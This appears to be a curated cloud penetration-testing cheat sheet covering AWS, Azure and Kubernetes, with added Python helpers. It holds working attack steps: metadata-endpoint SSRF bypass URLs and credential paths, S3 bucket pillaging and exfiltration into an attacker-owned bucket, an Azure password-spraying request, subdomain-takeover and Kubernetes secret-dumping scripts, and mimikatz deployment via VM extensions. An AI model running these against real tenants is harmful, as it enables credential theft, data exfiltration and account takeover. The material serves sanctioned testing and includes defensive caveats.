Cloud Penetration Testing



A curated list of cloud pentesting resources, covering AWS, Azure and Google Cloud


  • AWS basic info
    • mapping workflow
      • infrastructure mapping
      • service / container mapping
      • subdomain enumeration
      • URL / resource mapping
      • HTTP method enumeration
      • quick listing commands (note: "aws network public-ip list" is not an AWS CLI command; it is the Azure CLI's az network public-ip list --output table):
        aws ec2 describe-instances --query "Reservations[].Instances[].PublicIpAddress" --output table
        aws s3 ls --profile <profile name>
    • Amazon ARN format: arn:partition:service:region:account-id:resource-type/resource-id
      example: arn:aws:iam::123456789012:user/Development/product_1234/*  (IAM is global, so the region field is empty)
    • Amazon IAM
      • Identity and Access Management service
      • RBAC = role-based access control
      • ABAC = attribute-based access control (policy conditions keyed on tags/attributes of principal and resource)
      • IAM managed policies are versioned (v1, v2, …, up to five versions kept); iam:SetDefaultPolicyVersion on a policy whose older version is more permissive is a privilege-escalation path
    • KMS
      • Key Management Service
      • KMS keys are long-lived resources, unlike the temporary STS credentials (access key ID, secret key, session token) handed to roles
      • used to encrypt/decrypt data, e.g. S3 objects with SSE-KMS; reading such objects needs kms:Decrypt on the key in addition to s3:GetObject

Auth methods:

  • Programmatic access – Access + Secret Key
    • Secret Access Key and Access Key ID for authenticating via scripts and CLI
  • Management Console Access
    • Web Portal Access to AWS


  • AWS Usage
    • Some web applications pull content directly from S3 buckets
    • Look at where web resources are loaded from to determine whether S3 buckets are being used
    • Burp Suite: navigate the application as you normally would, then check the proxy history for requests to:
      • https://[bucketname].s3.amazonaws.com
      • https://s3-[region].amazonaws.com/[bucketname]  (path-style; the bucket name is often the org name)


  • Amazon Simple Storage Service (S3)
    • Storage service that is "secure by default": new buckets are private
    • Configuration mistakes are what make buckets public: ACL grants to the AllUsers / AuthenticatedUsers groups, or a bucket policy with Principal "*"
    • nslookup on the bucket hostname can reveal the region (the answer names the regional S3 endpoint)
    • S3 URL formats:
      • https://[bucketname].s3.amazonaws.com
      • https://s3-[region].amazonaws.com/[bucketname]
    • Useful commands (add --no-sign-request to test anonymous access instead of a profile):
      • aws s3 ls s3://bucket-name-here --region [region]
      • aws s3api get-bucket-acl --bucket bucket-name-here
      • aws s3 cp readme.txt s3://bucket-name-here --profile newuserprofile   (a successful upload means the bucket is writable by that principal)
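The get-bucket-acl output above is JSON; the two grantee URIs that make a bucket public are easy to miss by eye. The following is an added example, not code from this list or from any tool it mentions: it builds the URL forms worth trying for a bucket name and parses a get-bucket-acl document for public grants. The ACL document is constructed to mirror the real output shape; the bucket name "glitchcloud" is only a placeholder.

```python
import json

# Grantee URIs that make a bucket ACL "public" (the two AWS global groups).
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}

# What each ACL permission lets an anonymous / any-AWS-account principal do.
IMPACT = {
    "READ": "list objects (aws s3 ls)",
    "WRITE": "upload/overwrite objects (code injection into served content)",
    "READ_ACP": "read the ACL",
    "WRITE_ACP": "rewrite the ACL (can grant itself FULL_CONTROL)",
    "FULL_CONTROL": "everything",
}


def bucket_urls(bucket, region):
    """S3 URL forms worth trying in Burp/curl for a bucket name seen in a web app."""
    return [
        "https://%s.s3.amazonaws.com" % bucket,               # virtual-hosted, global endpoint
        "https://%s.s3.%s.amazonaws.com" % (bucket, region),   # virtual-hosted, regional
        "https://s3.%s.amazonaws.com/%s" % (region, bucket),   # path-style, regional
        "https://s3-%s.amazonaws.com/%s" % (region, bucket),   # legacy dashed path-style (the s3-[region] form above)
    ]


def public_grants(acl_json):
    """Parse `aws s3api get-bucket-acl` output; return [(group, permission, impact)]
    for every grant made to AllUsers or AuthenticatedUsers."""
    acl = json.loads(acl_json)
    found = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue
        group = PUBLIC_GROUPS.get(grantee.get("URI"))
        if group is None:
            continue  # e.g. the s3/LogDelivery group, which is not public
        perm = grant.get("Permission", "")
        found.append((group, perm, IMPACT.get(perm, "unknown permission")))
    return found


def is_anonymous_writable(acl_json):
    """True when anyone on the internet (AllUsers) can upload objects."""
    return any(g == "AllUsers" and p in ("WRITE", "FULL_CONTROL")
               for g, p, _ in public_grants(acl_json))


# Constructed sample ACL shaped like the real get-bucket-acl JSON; not a real bucket.
SAMPLE_ACL = json.dumps({
    "Owner": {"DisplayName": "glitchcloud-owner", "ID": "0" * 64},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "0" * 64, "DisplayName": "glitchcloud-owner"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
         "Permission": "WRITE"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/s3/LogDelivery"},
         "Permission": "WRITE"},
    ],
})

if __name__ == "__main__":
    for url in bucket_urls("glitchcloud", "us-east-1"):
        print(url)
    for group, perm, impact in public_grants(SAMPLE_ACL):
        print("%s has %s: %s" % (group, perm, impact))
    print("anonymous writable:", is_anonymous_writable(SAMPLE_ACL))
```

AuthenticatedUsers means any AWS account in the world, not "our users", so a WRITE grant to it is effectively public write; the sample reports it as a public grant but not as anonymous-writable, which is the distinction the --no-sign-request test above exercises.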

EBS Volumes:

  • Elastic Block Store (EBS)
  • AWS virtual hard disks (the boot and data volumes of EC2 instances)
  • Can have issues similar to S3: snapshots can be shared publicly, exposing whole disks (credentials, keys, source) to any AWS account
  • Difficult to target a specific org, but widespread leaks can be found: aws ec2 describe-snapshots --restorable-by-user-ids all lists public snapshots, which you can copy and mount in your own account

EC2 Instances:

  • Like virtual machines
  • An SSH key pair is assigned when the instance is launched; Windows instances use RDP with a password decrypted using that key pair
  • Security groups handle open ports and allowed source IPs

AWS Instance Metadata URL

  • Cloud servers such as EC2 instances needed a way to discover their own identity and configuration because they are created dynamically
  • A "metadata" endpoint is served on the non-routable link-local address 169.254.169.254
  • It can expose the instance's IAM role credentials (access key, secret key and session token)
  • Server compromise or an SSRF vulnerability lets a remote attacker reach it
  • IAM role credentials are at http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
  • It can sometimes be reached from outside through a proxy service (e.g. Nginx) hosted in AWS that forwards to arbitrary upstreams:
    curl --proxy http://[proxy-host]:[port] http://169.254.169.254/latest/meta-data/ && echo
  • Caveat: where IMDSv2 is enforced, every request needs a session token obtained with a PUT to /latest/api/token carrying the X-aws-ec2-metadata-token-ttl-seconds header, and the token's hop limit (1 by default) stops it crossing a network hop; a GET-only SSRF or a request relayed through a proxy therefore fails

Other bypasses

  • EKS: with AWS credentials that are mapped into the cluster (aws-auth ConfigMap or EKS access entries), pull a kubeconfig and pillage the cluster's Secrets
aws eks list-clusters | jq -rc '.clusters'
aws eks update-kubeconfig --name example
kubectl get secrets --all-namespaces
  • SSRF bypasses for reaching the metadata endpoint when a filter only blocks the literal 169.254.169.254 (all three spell the same address):
Converted decimal IP: http://2852039166/latest/meta-data/
IPv6-mapped, compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
IPv6-mapped, expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/
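The three URLs above are hand-written encodings of one address. As an added example (not code from this list or from any tool it names), the block below generates those spellings plus the hex and dotted-octal forms from the dotted quad, and shows the normalisation a filter has to do before a deny-list comparison is meaningful. The helper names are my own; the address and path are the standard IMDS ones.

```python
import ipaddress
import socket
import struct
from urllib.parse import urlsplit

# AWS IMDS address; the decimal and IPv6 forms listed above all encode this host.
IMDS_IP = "169.254.169.254"
IMDS_PATH = "/latest/meta-data/"


def ip_variants(ip):
    """Alternate spellings of a dotted-quad IPv4 address that URL parsers and
    libcurl-style resolvers accept but string-matching SSRF deny-lists miss."""
    octets = [int(o) for o in ip.split(".")]
    as_int = struct.unpack("!I", socket.inet_aton(ip))[0]
    hi, lo = (octets[0] << 8) | octets[1], (octets[2] << 8) | octets[3]
    return {
        "dotted": ip,
        "decimal": str(as_int),                                  # http://2852039166/
        "hex": "0x%08x" % as_int,                                # http://0xa9fea9fe/
        "dotted_octal": ".".join("0%o" % o for o in octets),     # http://0251.0376.0251.0376/
        "ipv6_mapped_compressed": "[::ffff:%x:%x]" % (hi, lo),
        "ipv6_mapped_expanded": "[0:0:0:0:0:ffff:%x:%x]" % (hi, lo),
    }


def bypass_urls(path=IMDS_PATH):
    """Candidate URLs to feed an SSRF sink when the literal IMDS address is blocked."""
    return ["http://%s%s" % (v, path) for v in ip_variants(IMDS_IP).values()]


def canonical_ipv4(host):
    """Normalise a URL host literal back to a dotted quad, or None if it is not an
    IPv4 literal in one of the forms above. A filter must do this (or resolve the
    host) before comparing against a deny-list."""
    h = host.strip("[]").lower()
    parts = h.split(".")
    # dotted octal is checked first: some Python versions read 0251 as decimal 251
    if len(parts) == 4 and all(len(p) > 1 and p.startswith("0") for p in parts):
        try:
            return ".".join(str(int(p, 8)) for p in parts)
        except ValueError:
            return None
    try:
        addr = ipaddress.ip_address(h)
    except ValueError:
        addr = None
    if addr is not None:
        if addr.version == 6:
            return str(addr.ipv4_mapped) if addr.ipv4_mapped else None
        return str(addr)
    try:
        n = int(h, 0)     # plain decimal or 0x-prefixed hex as a single number
    except ValueError:
        return None
    if 0 <= n <= 0xFFFFFFFF:
        return socket.inet_ntoa(struct.pack("!I", n))
    return None


def targets_imds(url):
    """True if the URL's host literal denotes the metadata service."""
    host = urlsplit(url).hostname
    return host is not None and canonical_ipv4(host) == IMDS_IP


if __name__ == "__main__":
    for u in bypass_urls():
        print(u, "->", targets_imds(u))
```

These encodings only help against filters that compare strings; they do nothing against IMDSv2's token requirement, and a filter that resolves the host and checks the resulting address (as canonical_ipv4 does for literals) catches all of them.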

Interesting metadata instance URLs:

http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://instance-data/latest/meta-data/   (the instance-data hostname resolves to the metadata service from inside EC2)

Find subdomains

  • Brute forcing with dnsrecon (-d target domain, -D wordlist, -t brt = brute force)
python3 dnsrecon.py -d [domain] -D subdomains-top1mil-5000.txt -t brt

S3 attack

  • S3 Bucket Pillaging
  • GOAL: locate Amazon S3 buckets and search them for interesting data
  • In this lab you will attempt to identify a publicly accessible S3 bucket hosted by an organization. After identifying it you will list its contents and download the files hosted there.
~$ sudo apt-get install python3-pip
~$ git clone https://github.com/RhinoSecurityLabs/pacu.git
~$ cd pacu
~$ sudo bash install.sh
~$ sudo aws configure
~$ sudo python3 pacu.py
(newer Pacu releases install with pip3 install -U pacu and start with the pacu command)

Pacu > import_keys --all
# Search for buckets by domain / keyword
Pacu > run s3__bucket_finder -d glitchcloud
# List files in the bucket (Pacu forwards aws ... lines to the AWS CLI)
Pacu > aws s3 ls s3://glitchcloud
# Download files
Pacu > aws s3 sync s3://glitchcloud s3-files-dir
  • S3 Code Injection
    • Backdoor JavaScript in S3 buckets used by web apps
    • In March 2018, crypto-miner malware was found loading on MSN's homepage
    • The cause was a writable S3 bucket belonging to AOL's advertising platform, whose content was served on MSN
    • If a web app loads content from a publicly writable S3 bucket, an attacker can upload malicious JS that runs in every visitor's browser
    • This gives XSS-style attacks against the web app's visitors, e.g. hooking browsers with BeEF
  • Domain Hijacking (dangling S3 CNAMEs)
    • Hijack an S3 domain by finding references in a web app to S3 buckets that no longer exist
    • ... or subdomains whose CNAME still points at an S3 bucket that has since been deleted
    • When assessing web apps, look for 404 responses coming from S3 hostnames
    • When brute forcing subdomains for an org, look for 404s carrying the 'NoSuchBucket' error
    • Create an S3 bucket with the same name (and, for website endpoints, the same region) in your own account
    • Load malicious content into the new bucket; it is served to visitors of the hijacked hostname
    • Caveat: a 403 'AccessDenied' means the bucket exists in someone else's account and cannot be claimed
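The dangling-CNAME check above is easy to automate because S3 tells you the outcome in its error body. The block below is an added example, not code from this list or from any tool it mentions: given a subdomain, its CNAME target, and the status and body of one GET, it separates takeover candidates (NoSuchBucket) from buckets that exist (AccessDenied or 200), extracts the bucket name and region to recreate, and handles both the XML error of REST endpoints and the HTML error page of website endpoints. The records and error bodies are constructed samples; the example.com hostnames are placeholders.

```python
import re
import xml.etree.ElementTree as ET

# S3 REST and static-website endpoints as they appear in CNAME targets, e.g.
#   assets.example.com.s3.amazonaws.com
#   assets-example.s3.eu-west-1.amazonaws.com
#   www.example.com.s3-website-us-east-1.amazonaws.com
#   www.example.com.s3-website.us-east-2.amazonaws.com
S3_ENDPOINT_RE = re.compile(
    r"^(?:(?P<bucket>[a-z0-9.-]+)\.)?s3(?P<website>-website)?"
    r"(?:[.-](?P<region>[a-z]{2}-[a-z]+-\d))?\.amazonaws\.com$",
    re.IGNORECASE,
)
# Website endpoints answer with an HTML page ("Code: NoSuchBucket") instead of XML.
HTML_CODE = re.compile(r"Code:\s*([A-Za-z]+)")
HTML_BUCKET = re.compile(r"BucketName:\s*([A-Za-z0-9._-]+)")


def parse_s3_error(body):
    """Return (Code, BucketName) from an S3 error body (XML or website HTML), else (None, None)."""
    try:
        root = ET.fromstring(body)
        if root.tag == "Error":
            return root.findtext("Code"), root.findtext("BucketName")
    except ET.ParseError:
        pass
    code, bucket = HTML_CODE.search(body), HTML_BUCKET.search(body)
    return (code.group(1) if code else None, bucket.group(1) if bucket else None)


def classify(hostname, cname, status, body):
    """Decide whether a subdomain whose CNAME points at S3 can be taken over."""
    m = S3_ENDPOINT_RE.match(cname.rstrip(".").lower())
    if not m:
        return {"host": hostname, "verdict": "not-s3"}
    code, bucket = parse_s3_error(body)
    result = {
        "host": hostname,
        "bucket": bucket or m.group("bucket") or hostname,
        # website endpoints are regional, so the bucket must be created in this region;
        # None means the global REST endpoint, which does not pin a region
        "region": m.group("region"),
        "website": bool(m.group("website")),
    }
    if code == "NoSuchBucket":
        result["verdict"] = "takeover-candidate"
    elif code == "AccessDenied":
        result["verdict"] = "bucket-exists-private"   # owned by someone else; cannot be claimed
    elif status == 200:
        result["verdict"] = "bucket-exists-public"
    else:
        result["verdict"] = "bucket-exists"
    return result


def claim_command(result):
    """The aws cli call that claims a takeover candidate in your own account."""
    if result.get("verdict") != "takeover-candidate":
        return None
    return "aws s3 mb s3://%s --region %s" % (result["bucket"], result["region"] or "us-east-1")


# Constructed sample responses shaped like real S3 errors (not captured traffic).
NOSUCHBUCKET_XML = ('<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchBucket</Code>'
                    '<Message>The specified bucket does not exist</Message>'
                    '<BucketName>assets.example.com</BucketName><RequestId>X</RequestId></Error>')
NOSUCHBUCKET_HTML = ('<html><body><h1>404 Not Found</h1><ul><li>Code: NoSuchBucket</li>'
                     '<li>Message: The specified bucket does not exist</li>'
                     '<li>BucketName: www.example.com</li></ul></body></html>')
ACCESSDENIED_XML = ('<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code>'
                    '<Message>Access Denied</Message></Error>')

SAMPLE_RECORDS = [
    ("assets.example.com", "assets.example.com.s3.amazonaws.com", 404, NOSUCHBUCKET_XML),
    ("www.example.com", "www.example.com.s3-website-us-east-1.amazonaws.com", 404, NOSUCHBUCKET_HTML),
    ("files.example.com", "files-example.s3.eu-west-1.amazonaws.com", 403, ACCESSDENIED_XML),
    ("cdn.example.com", "d111111abcdef8.cloudfront.net", 200, "<html>ok</html>"),
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        r = classify(*rec)
        print(r, claim_command(r))
```

For a website-endpoint CNAME the bucket name must equal the full hostname, which the BucketName field in the error confirms; for the global REST endpoint the region is not pinned, so the claim command falls back to us-east-1.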

AWS Lambda

  • A function's execution-role credentials are injected as environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN), so a command injection in a function can dump them with env
  • If env is blocked, try reading the same variables another way, e.g. cat /proc/self/environ or os.environ from inside the runtime; the session token is short-lived, so use the keys quickly


  • Check if the company uses Azure AD:
    - Query https://login.microsoftonline.com/getuserrealm.srf?login=[user@domain]&json=1
    - If NameSpaceType is "Managed", the company uses Azure AD (cloud authentication); "Federated" means logins are redirected to an on-prem IdP such as ADFS (the AuthURL field says where); "Unknown" means there is no tenant for that domain
  • Auth methods:
    • Password Hash Synchronization
      • Azure AD Connect
      • On-prem service synchronizes password hashes (a salted hash of each NT hash) to Azure AD
      • Users authenticate directly to Azure services like O365 with their internal domain credentials
    • Pass Through Authentication
      • Credentials stored only on-prem
      • An on-prem agent validates authentication requests that Azure AD forwards to it
      • Allows SSO to other Azure apps without credentials stored in the cloud
    • Active Directory Federation Services (ADFS)
      • Credentials stored only on-prem
      • A federated trust is set up between Azure AD and on-prem AD so that ADFS validates auth requests for the cloud
      • For password attacks you have to authenticate to the on-prem ADFS portal instead of the Azure endpoints
    • Certificate-based auth
      • Client certificates for authentication to the API
      • Certificate management in the legacy Azure Service Management (ASM) model makes it impossible to tell who created a certificate (persistence potential)
    • Conditional access policies
    • Long-term access tokens
      • Authentication to Azure with OAuth tokens
      • Desktop CLI tools used to authenticate store access and refresh tokens on disk (e.g. the Azure CLI's ~/.azure directory), so they can be lifted from a compromised workstation
    • Legacy authentication portals (no MFA or conditional access enforcement)


  • O365 Usage
  • User enumeration on Azure AD can be performed against the login endpoint (login.microsoftonline.com/common/GetCredentialType), which answers differently for existing and non-existing users
  • Microsoft Azure Storage:
    • Microsoft Azure Storage is like Amazon S3
    • Blob storage is for unstructured data
    • Containers and blobs can be publicly accessible via access policies
    • Predictable URLs: https://[storage-account].blob.core.windows.net/[container]/[blob]
    • The "Blob" access level means anyone can anonymously read blobs, but can't list the blobs in the container
    • The "Container" access level additionally allows anonymous listing of the blobs in that container
    • MicroBurst (PowerShell) brute-forces storage account and container names, e.g. Invoke-EnumerateAzureBlobs
  • Password Attacks
    • Password spraying Microsoft Online (Azure AD / O365) via the OAuth resource owner password credentials (ROPC) grant; one attempt looks like this:
      POST /common/oauth2/token HTTP/1.1
      Host: login.microsoftonline.com
      Accept: application/json
      Content-Type: application/x-www-form-urlencoded
      Content-Length: [length]
      Expect: 100-continue
      Connection: close

      resource=https://graph.windows.net&client_id=1b730954-1685-4b74-9bfd-dac224a7b894&client_info=1&grant_type=password&username=[user@domain]&password=Winter2020&scope=openid
    • The client_id is the Azure AD PowerShell public client; the AADSTS code in the error response tells you whether the password was wrong, the account is locked, or the password was right but MFA / conditional access blocked the token
  • Interesting metadata instance URLs (Azure IMDS; requests must carry the header Metadata: true, which blocks naive SSRF):
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

Basic Azure AD concepts and tips

  • Source of authentication for Office 365, Azure Resource Manager, and anything else integrated with it.
  • Azure AD principals
    • Users
    • Devices
    • Applications (service principals)
  • Azure AD roles
    • Azure RBAC roles apply only to Azure Resource Manager resources (subscriptions, resource groups, VMs, storage)
    • Office 365 and the directory itself use Azure AD administrator (directory) roles such as Global Administrator; the two role systems are separate, although a Global Administrator can elevate itself to User Access Administrator over every subscription
  • Azure AD applications
    • Microsoft Graph (the API behind user, group, mail and SharePoint access; application permissions granted to a registered app are a persistence vector)

Azure Block Blobs (S3 equivalent) attacks

* Discovering with Google dorks
site:*.blob.core.windows.net ext:xlsx | ext:csv "password"
* Discovering with DNS enumeration (dnscan: -d domain, -w wordlist)
python dnscan.py -d [domain] -w subdomains-100.txt

Cloud Labs

CDN – Domain Fronting

Golden SAML attack

  • Azure AD trusts SAML assertions from a federated IdP (ADFS); an attacker holding the ADFS token-signing certificate can forge assertions for any user, MFA included, without ever touching the IdP again
  • SAML: Security Assertion Markup Language, XML-based, used for SSO logins to services such as Office 365
  • Azure AD ships a large set of predefined built-in roles (around 70)
  • ADFS is a SAML IdP backed by Active Directory
  • shimit: a tool that implements the Golden SAML attack
  • Detection caveat: forged assertions never appear in ADFS authentication logs, so Azure AD sign-ins with no matching ADFS issuance are the signal

Azure Tips

  • Azure VMs are the EC2 equivalent for compute
  • Azure's serverless functions are called "Azure Functions"; they are attacked with the usual web bugs (OWASP Top 10), now against cloud-native targets
  • With Contributor rights on a VM we can execute scripts (Python, Bash, PowerShell) on it through the control plane, i.e. code execution without any guest OS credentials:
    • add the Custom Script Extension in the VM's Extensions section (or use az vm run-command invoke); it runs the script as SYSTEM / root
    • this gives code execution on Azure-hosted hosts
  • Windows VMs and containers usually have no interactive GUI session; drop mimikatz through the extension, dump credentials, and use them for lateral movement, including into the on-prem network

cloud native

  • gRPC: an RPC framework designed for cloud-native services (protobuf serialization over HTTP/2); its binary request bodies need a protobuf-aware proxy to test
  • Session state storage: Redis / Memcached (often unauthenticated inside the VPC)
  • Deployment CI/CD: Jenkins, Travis CI, Atlassian (Bitbucket Pipelines / Bamboo); build secrets and deploy credentials live here
  • ngrok: exposes a local port on a public URL, handy for catching SSRF and other out-of-band callbacks from a host that sits behind NAT or a WAF
  • Typical cloud-native bugs:
    • account takeover
    • OWASP Top 10
    • SSRF (metadata endpoint)
    • command injection
    • SQL injection
  • A service mesh (e.g. Istio on Kubernetes) is infrastructure for running microservices; it is not the same thing as the microservice application itself

kubernetes tools

  • kube-hunter : Hunt for security weaknesses in Kubernetes clusters
  • trivy : Scanner for vulnerabilities in container images, file systems, and Git repositories, as well as for configuration issues and hard-coded secrets
  • CeWL : CeWL is a Custom Word List Generator with a site crawler
  • proxycannon-ng : A private botnet using multiple cloud environments for pentesters and red teamers. – Built by the community during a hackathon at the WWHF 2018 security conference
  • domainhunter : Checks expired domains for categorization/reputation and history to determine good candidates for phishing and C2 domain names
  • peirates : Peirates – Kubernetes Penetration Testing tool

password attack method

  • credential stuffing attack
  • bruteforce
  • dictionary

Cloud pivoting = exfiltrating a bucket into an attacker-controlled bucket

aws s3 sync s3://source-bucket s3://destination-bucket --acl bucket-owner-full-control

  • s3 sync takes bucket/prefix URIs, not shell wildcards; run it with the compromised credentials against a destination bucket in your own account whose bucket policy allows that principal to PutObject, and --acl bucket-owner-full-control makes the copied objects readable to you as the destination owner

Docker Container

  • Stateful instance of an image with a writable layer
  • Contains everything needed to run the application

Kubernetes

  • Kubernetes is a container orchestrator, not a security product: it enforces only the RBAC, network policies and admission controls you configure
  • The Kubernetes control plane (master) exposes the API server through which nodes and users are managed
  • Each Kubernetes node runs kubelet to talk to the API server and kube-proxy to implement Kubernetes service networking on that node
  • Kubernetes objects are abstractions of the desired state of your system
  • Pods: a collection of containers that share a network namespace (one IP) and run on the same node
  • Services: a stable virtual IP / DNS name in front of a group of pods running in the cluster
  • Volumes: a directory accessible to all containers in a pod; solves the problem of losing data when a container crashes and restarts
  • Namespaces: the scope of Kubernetes objects, like a workspace (e.g. dev-space); a namespace is not a security boundary unless RBAC and network policies make it one
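The "kubectl get secrets" step in the EKS bypass above and the Secret object described here share one property worth seeing in code: Secret values are base64, not encrypted, so anyone with read access holds plaintext. The block below is an added example, not code from this list or from any Kubernetes tool: it decodes the JSON that kubectl get secrets -A -o json prints and flags values that look like usable credentials (AWS keys, private keys, JWTs, registry auths, or credential-looking key names). The kubectl output is constructed inline; the AWS key pair in it is the documented AWS example pair and every other value is fake.

```python
import base64
import json
import re

# Patterns worth flagging in decoded Secret values.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |)PRIVATE KEY-----"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]{5,}\.eyJ[A-Za-z0-9_-]{5,}\.[A-Za-z0-9_-]{5,}"),
    "docker_registry_auth": re.compile(r'"auths"\s*:'),
}
# Key names that usually hold a credential even when the value matches no pattern.
SENSITIVE_KEY = re.compile(r"pass|pwd|secret|token|key", re.IGNORECASE)


def decode_secrets(kubectl_json):
    """Decode every data field of `kubectl get secrets -A -o json` into
    (namespace/name, type, key, plaintext) tuples."""
    items = json.loads(kubectl_json).get("items", [])
    out = []
    for item in items:
        meta = item.get("metadata", {})
        ref = "%s/%s" % (meta.get("namespace", "default"), meta.get("name", "?"))
        for key, b64 in (item.get("data") or {}).items():
            plain = base64.b64decode(b64).decode("utf-8", "replace")
            out.append((ref, item.get("type", "Opaque"), key, plain))
    return out


def find_credentials(decoded):
    """Return [(secret, key, label)] for values that look like usable credentials."""
    hits = []
    for ref, _typ, key, plain in decoded:
        labels = [name for name, rx in PATTERNS.items() if rx.search(plain)]
        if not labels and SENSITIVE_KEY.search(key):
            labels = ["sensitive-key-name"]
        for label in labels:
            hits.append((ref, key, label))
    return hits


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed kubectl output: AWS's documented example key pair, a fake DB password,
# a fake registry auth and a fake service-account JWT.
SAMPLE_KUBECTL = json.dumps({"items": [
    {"metadata": {"namespace": "prod", "name": "aws-creds"}, "type": "Opaque",
     "data": {"AWS_ACCESS_KEY_ID": _b64("AKIAIOSFODNN7EXAMPLE"),
              "AWS_SECRET_ACCESS_KEY": _b64("wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY")}},
    {"metadata": {"namespace": "prod", "name": "db"}, "type": "Opaque",
     "data": {"username": _b64("app"), "password": _b64("hunter2")}},
    {"metadata": {"namespace": "default", "name": "regcred"}, "type": "kubernetes.io/dockerconfigjson",
     "data": {".dockerconfigjson": _b64('{"auths":{"registry.example.com":{"auth":"dXNlcjpwYXNz"}}}')}},
    {"metadata": {"namespace": "kube-system", "name": "deployer-token"},
     "type": "kubernetes.io/service-account-token",
     "data": {"token": _b64("eyJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJrdWJlcm5ldGVzIn0.c2lnbmF0dXJl"),
              "ca.crt": _b64("-----BEGIN CERTIFICATE-----\nMIIB\n-----END CERTIFICATE-----")}},
]})

if __name__ == "__main__":
    for ref, key, label in find_credentials(decode_secrets(SAMPLE_KUBECTL)):
        print("%-28s %-22s %s" % (ref, key, label))
```

From inside a pod the same kind of token is mounted at /var/run/secrets/kubernetes.io/serviceaccount/token; if that service account can list Secrets cluster-wide, this script applied to the API server's answer is the whole pillage.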

Microsoft Graph

  • With a Graph access token (delegated scopes such as Mail.Read or Files.Read.All, or application permissions granted to a registered app) we can read and manage Exchange mailboxes and SharePoint / OneDrive content through the Azure API

Important tips from the SANS SEC588 (Cloud Penetration Testing) course



This Cloud Penetration Testing list is a GitHub repository by kh4sh3i.